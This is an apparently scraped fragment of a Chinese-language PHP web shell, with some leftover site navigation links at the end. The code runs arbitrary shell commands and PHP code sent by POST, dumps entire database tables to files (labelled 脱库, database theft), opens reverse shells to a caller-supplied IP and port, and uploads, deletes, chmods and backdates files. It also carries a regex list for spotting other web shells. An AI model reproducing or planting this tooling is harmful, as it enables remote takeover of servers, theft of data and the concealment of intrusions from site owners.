- $infos = array('程序说明' => '采用POST浏览是为了不记录浏览日志.
登录密码保存在页面中,所以无须COOKIE和SESSION.登录有效期为当前页面进程.
请勿将本程序作为非法用途.','客户端浏览器信息' => $_SERVER['HTTP_USER_AGENT'],'被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)','被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)','PHP.ini配置路径' => $tmp[2][1] ? $tmp[2][1] : '(无)','PHP运行方式' => php_sapi_name(),'PHP版本' => PHP_VERSION,'PHP进程PID' => getmypid(),'客户端IP' => $_SERVER['REMOTE_ADDR'],'客户端文字编码' => $_SERVER['HTTP_ACCEPT_LANGUAGE'],'Web服务端口' => $_SERVER['SERVER_PORT'],'Web根目录' => $_SERVER['DOCUMENT_ROOT'],'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'],'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'],'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)','当前磁盘总大小' => size(disk_total_space('.')),'当前磁盘可用空间' => size(disk_free_space('.')),'POST最大字数量' => get_cfg_var("post_max_size"),'允许最大上传文件' => get_cfg_var("upload_max_filesize"),'程序最大使用内存量' => get_cfg_var("memory_limit"),'程序最长运行时间' => get_cfg_var("max_execution_time") . '秒','是否支持Fsockopen' => function_exists('fsockopen') ? '是' : '否','是否支持Socket' => function_exists('socket_close') ? '是' : '否','是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否','是否支持Curl' => function_exists('curl_version') ? '是' : '否','是否支持Zlib' => function_exists('gzclose') ? '是' : '否','是否支持FTP' => function_exists('ftp_login') ? '是' : '否','是否支持XML' => function_exists('xml_set_object') ? '是' : '否','是否支持GD_Library' => function_exists('imageline') ? '是' : '否','是否支持COM组建' => class_exists('COM') ? '是' : '否','是否支持ODBC组建' => function_exists('odbc_close') ? '是' : '否','是否支持IMAP邮件' => function_exists('imap_close') ? '是' : '否','是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否','是否允许URL打开文件' => get_cfg_var("allow_url_fopen") ? '是' : '否','是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否','是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否','是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否','是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否','PHP编译参数' => $tmp[2][0] ? $tmp[2][0] : '(无)');echo '' . $msg . '
';echo '| 名称 | 参数 |
|---|
';foreach ($infos as $name => $var) {echo '| ' . $name . ' | ' . $var . ' |
';}echo '
';break;case "exec":$cmd = $win ? 'dir' : 'ls -al';$res = array('res' => '命令回显','msg' => $msg);$str = isset($_POST['str']) ? $_POST['str'] : 'fun';if (isset($_POST['cmd'])) {$cmd = $_POST['cmd'];$cwd = $str == 'fun' ? THISDIR : 'com';$res = command($cmd, $cwd);}echo '' . $res['msg'] . '
';echo '';break;case "scan":$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$keyword = isset($_POST['keyword']) ? $_POST['keyword'] : '';$include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py';$filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js';echo '' . $msg . '
';echo '';if ($keyword != '') {flush();ob_flush();echo '';$incs = $include == '' ? false : explode('|', $include);$fits = $filters == '' ? false : explode('|', $filters);scanfile(strdir($scandir . '/'), $keyword, $incs, $fits, $_POST['type'], $_POST['char'], $_POST['range'], $nowdir);echo '搜索完成
';}break;case "antivirus":$scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir;$typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php');echo '' . $msg . '
';echo '';if (count($_POST['types']) > 0) {$matches = array('php' => array('/function\_exists\s*\(\s*[\'|"](popen|exec|proc\_open|system|passthru)+[\'|"]\s*\)/i','/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i','/(udp\:\/\/(.*)\;)+/i','/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/preg\_replace\s*\((.*)\(base64\_decode\(\$/i','/(eval|assert|include|require)+\s*\((.*)(base64\_decode|file\_get\_contents|php\:\/\/input)+/i','/(eval|assert|include|require|array\_map)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i','/\$\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\s*\(\s*\$(\w+)\s*\)/i','/\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\(\s*\$(.*)\)/i','/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\)/i','/(fopen|fwrite|fpust|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\](.*)\)/i','/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i','/new com\s*\(\s*[\'|"]shell(.*)[\'|"]\s*\)/i','/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i','/\$\_\=(.*)\$\_/i'),'asp+aspx' => array('/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i','/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/\(.*)\<\/script\>/i','/Load\s*\((.*)Request/i','/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i'),'jsp' => array('/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i','/(eval|execute)+(.*)request.item\s*\[(.*)\]/i','/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i','/Runtime\.getRuntime\(\)\.exec\((.*)\)/i','/FileOutputStream\(application\.getRealPath(.*)request/i'));flush();ob_flush();echo '';antivirus(strdir($scandir . '/'), $typearr, $matches, $nowdir);echo '扫描完成
';}break;case "phpeval":if (isset($_POST['phpcode'])) {$phpcode = chop($_POST['phpcode']);ob_start();if (substr($phpcode, 0, 2) == '') {@eval('?>' . $phpcode . '' . $msg . '
';echo '
';break;case "sql":if ((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) {$type = $_POST['type'];$sqlhost = $_POST['sqlhost'];$sqluser = $_POST['sqluser'];$sqlpass = $_POST['sqlpass'];$sqlname = $_POST['sqlname'];$sqlcode = $_POST['sqlcode'];$names = $_POST['names'];switch ($type) {case "PostgreSql":if (function_exists('pg_close')) {if (strstr($sqlhost, ':')) {$array = explode(':', $sqlhost);$sqlhost = $array[0];$sqlport = $array[1];} else {$sqlport = 5432;}$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");if ($dbconn) {$msg = '
连接' . $type . '成功
';pg_query('set client_encoding=' . $names);$result = pg_query($sqlcode);if ($result) {$msg .= '
- 执行SQL成功
';while ($array = pg_fetch_array($result)) {$rows[] = $array;}} else {$msg .= '
- 执行SQL失败
';$rows = array('error' => pg_result_error($result));}pg_free_result($result);} else {$msg = '
连接' . $type . '失败
';}@pg_close($dbconn);} else {$msg = '
不支持' . $type . '
';}break;case "MsSql":if (function_exists('mssql_close')) {$dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass);if ($dbconn) {$msg = '
连接' . $type . '成功
';mssql_select_db($sqlname, $dbconn);$result = mssql_query($sqlcode);if ($result) {$msg .= '
- 执行SQL成功
';while ($array = mssql_fetch_array($result)) {$rows[] = $array;}} else {$msg .= '
- 执行SQL失败
';}@mssql_free_result($result);} else {$msg = '
连接' . $type . '失败
';}@mssql_close($dbconn);} else {$msg = '
不支持' . $type . '
';}break;case "Oracle":if (function_exists('oci_close')) {$conn = @oci_connect($sqluser, $sqlpass, $sqlhost . '/' . $sqlname);if ($conn) {$msg = '
连接' . $type . '成功
';$stid = oci_parse($conn, $sqlcode);oci_execute($stid);if ($stid) {$msg .= '
- 执行SQL成功
';while (($array = oci_fetch_array($stid, OCI_ASSOC))) {$rows[] = $array;}} else {$msg .= '
- 执行SQL失败
';$e = oci_error();$rows = array('error' => $e['message']);}oci_free_statement($stid);} else {$e = oci_error();$rows = array('error' => $e['message']);$msg = '
连接' . $type . '失败
';}@oci_close($conn);} else {$msg = '
不支持' . $type . '
';}break;case "MySql":if (function_exists('mysql_close')) {$conn = mysql_connect(strstr($sqlhost, ':') ? $sqlhost : $sqlhost . ':3306', $sqluser, $sqlpass, $sqlname);if ($conn) {$msg = '
连接' . $type . '成功
';if (substr($sqlcode, 0, 7) == 't00lsa') {$array = array();$data = '';$i = 0;preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i', $sqlcode, $array);if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {mysql_select_db($array[1][0], $conn);mysql_query('set names ' . $names, $conn);$spidercode = 'select ' . $array[3][0] . ' from `' . $array[2][0] . '`;';$result = mysql_query($spidercode, $conn);if ($result) {while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$data .= join(' |x| ', $row) . "\r\n";$i++;}if ($data) {$file = strdir($array[4][0]);$msg .= filew($file, $data, 'w') ? '
- 脱库成功
' : '
- 导出文件失败
';$rows = array('file' => $file,size(filesize($file)) => '共获取' . $i . '条数据');} else {$msg .= '
- 没有数据
';}} else {$msg .= '
- 执行SQL失败
';$rows = array('errno' => mysql_errno(),'error' => mysql_error());}} else {$msg .= '
- 脱库语句错误
';}} elseif (!empty($sqlcode)) {mysql_select_db($sqlname, $conn);mysql_query('set names ' . $names, $conn);$result = mysql_query($sqlcode, $conn);if ($result) {$msg .= '
- 执行SQL成功
';while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) {$rows[] = $array;}} else {$msg .= '
- 执行SQL失败
';$rows = array('errno' => mysql_errno(),'error' => mysql_error());}}mysql_free_result($result);} else {$msg = '
连接' . $type . '失败
';$rows = array('errno' => mysql_errno(),'error' => mysql_error());}mysql_close($conn);} else {$msg = '
不支持' . $type . '
';}break;}} else {$type = 'MySql';$sqlhost = 'localhost:3306';$sqluser = 'root';$sqlpass = '123456';$sqlname = 'mysql';$sqlcode = 'select version();';$names = 'gbk';}echo '
' . $msg . '
';echo '
';if ($rows) {echo '
';ob_start();print_r($rows);$out = ob_get_contents();ob_end_clean();if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $out) && function_exists('iconv')) {$out = @iconv('UTF-8', 'GB2312//IGNORE', $out);}echo htmlspecialchars($out);echo '';}break;case "backshell":if ((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {$backip = $_POST['backip'];$backport = $_POST['backport'];$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';$type = $_POST['type'];$msg = backshell($backip, $backport, $temp, $type);} else {$backip = $_SERVER['REMOTE_ADDR'];$backport = '443';$temp = '/tmp';$type = 'pl';$msg = 'PHP反弹可兼容Linux和Windows 其余方法只用于Linux';}echo '
' . $msg . '
';echo '
';break;case "edit":case "editor":$file = strdir($_POST['godir'] . '/' . $_POST['govar']);$iconv = function_exists('iconv');if (!file_exists($file)) {$msg = '【新建文件】';} else {$code = filer($file);$chst = '默认';if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $code) && $iconv) {$chst = 'utf-8';$code = @iconv('UTF-8', 'GB2312//IGNORE', $code);}$size = size(filesize($file));$msg = '【文件属性 ' . substr(decoct(fileperms($file)), -4) . '】 【文件大小 ' . $size . '】 【文件编码 ' . $chst . '】';}echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');echo '
- ' . $msg . '
';echo '
';echo '
';echo '
';break;case "upfiles":$updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];$msg = '【最大上传文件 ' . get_cfg_var("upload_max_filesize") . '】 【POST最大提交数据 ' . get_cfg_var("post_max_size") . '】';$max = 10;if (isset($_FILES['uploads']) && isset($_POST['renames'])) {$uploads = $_FILES['uploads'];$msgs = array();for ($i = 1; $i < $max; $i++) {if ($uploads['error'][$i] == UPLOAD_ERR_OK) {$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];$filea = $uploads['tmp_name'][$i];$fileb = strdir($updir . '/' . $rename);$msgs[$i] = fileu($filea, $fileb) ? '
上传成功 ' . $rename . '
' : '
上传失败 ' . $rename . '
';}}}echo '
' . $msg . '
';echo '
';echo '
';break;default:if (isset($_FILES['upfile'])) {if ($_FILES['upfile']['name'] == '') {$msg = '
请选择文件
';} else {$rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename'];$filea = $_FILES['upfile']['tmp_name'];$fileb = strdir($nowdir . $rename);$msg = fileu($filea, $fileb) ? '
上传文件' . $rename . '成功
' : '
上传文件' . $rename . '失败
';}}if (isset($_POST['act'])) {switch ($_POST['act']) {case "a":if (!$_POST['files']) {$msg = '
请选择文件 ' . $_POST['var'] . '
';} else {$i = 0;foreach ($_POST['files'] as $filename) {$i += @copy(strdir($nowdir . $filename), strdir($_POST['var'] . '/' . $filename)) ? 1 : 0;}$msg = $msg = $i ? '
共复制 ' . $i . ' 个文件到' . $_POST['var'] . '成功
' : '
共复制 ' . $i . ' 个文件到' . $_POST['var'] . '失败
';}break;case "b":if (!$_POST['files']) {$msg = '
请选择文件
';} else {$i = 0;foreach ($_POST['files'] as $filename) {$i += @unlink(strdir($nowdir . $filename)) ? 1 : 0;}$msg = $i ? '
共删除 ' . $i . ' 个文件成功
' : '
共删除 ' . $i . ' 个文件失败
';}break;case "c":if (!$_POST['files']) {$msg = '
请选择文件 ' . $_POST['var'] . '
';} elseif (!ereg("^[0-7]{4}$", $_POST['var'])) {$msg = '
属性值错误
';} else {$i = 0;foreach ($_POST['files'] as $filename) {$i += @chmod(strdir($nowdir . $filename), base_convert($_POST['var'], 8, 10)) ? 1 : 0;}$msg = $i ? '
共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '成功
' : '
共 ' . $i . ' 个文件修改属性为' . $_POST['var'] . '失败
';}break;case "d":if (!$_POST['files']) {$msg = '
请选择文件 ' . $_POST['var'] . '
';} elseif (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['var'])) {$msg = '
时间格式错误 ' . $_POST['var'] . '
';} else {$i = 0;foreach ($_POST['files'] as $filename) {$i += @touch(strdir($nowdir . $filename), strtotime($_POST['var'])) ? 1 : 0;}$msg = $i ? '
共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '成功
' : '
共 ' . $i . ' 个文件修改时间为' . $_POST['var'] . '失败
';}break;case "e":$path = strdir($nowdir . $_POST['var'] . '/');if (file_exists($path)) {$msg = '
目录已存在 ' . $_POST['var'] . '
';} else {$msg = @mkdir($path, 0777) ? '
创建目录 ' . $_POST['var'] . ' 成功
' : '
创建目录 ' . $_POST['var'] . ' 失败
';}break;case "rf":$files = explode('|x|', $_POST['var']);if (count($files) != 2) {$msg = '
输入错误
';} else {$msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? '
重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 成功
' : '
重命名 ' . $files[1] . ' 为 ' . $files[0] . ' 失败
';}break;case "pd":$files = explode('|x|', $_POST['var']);if (count($files) != 2) {$msg = '
输入错误
';} else {$path = strdir($nowdir . $files[1]);$msg = @chmod($path, base_convert($files[0], 8, 10)) ? '
修改' . $files[1] . '属性为' . $files[0] . '成功
' : '
修改' . $files[1] . '属性为' . $files[0] . '失败
';}break;case "edit":if (isset($_POST['filename']) && isset($_POST['filecode'])) {if ($_POST['tostr'] == 'utf') {$_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']);}$msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '
保存成功 ' . $_POST['filename'] . '
' : '
保存失败 ' . $_POST['filename'] . '
';}break;case "deltree":$deldir = strdir($nowdir . $_POST['var'] . '/');if (!file_exists($deldir)) {$msg = '
目录 ' . $_POST['var'] . ' 不存在
';} else {$msg = deltree($deldir) ? '
删除目录 ' . $_POST['var'] . ' 成功
' : '
删除目录 ' . $_POST['var'] . ' 失败
';}break;}}$array = showdir($nowdir);$thisurl = strdir('/' . strtr($nowdir, array(ROOTDIR => '')) . '/');$chown = substr(decoct(fileperms($nowdir)), -4);if (!$chown) {$chown = '0000';}$nowdir = strtr($nowdir, array('\'' => '%27','"' => '%22'));echo '
' . $msg . '
';echo '
';echo ' ';echo ' ';echo ' ';echo '
';echo '
';break;}?>
English
한국 사람
日本語
繁體中文
简体中文
立即注册
登录
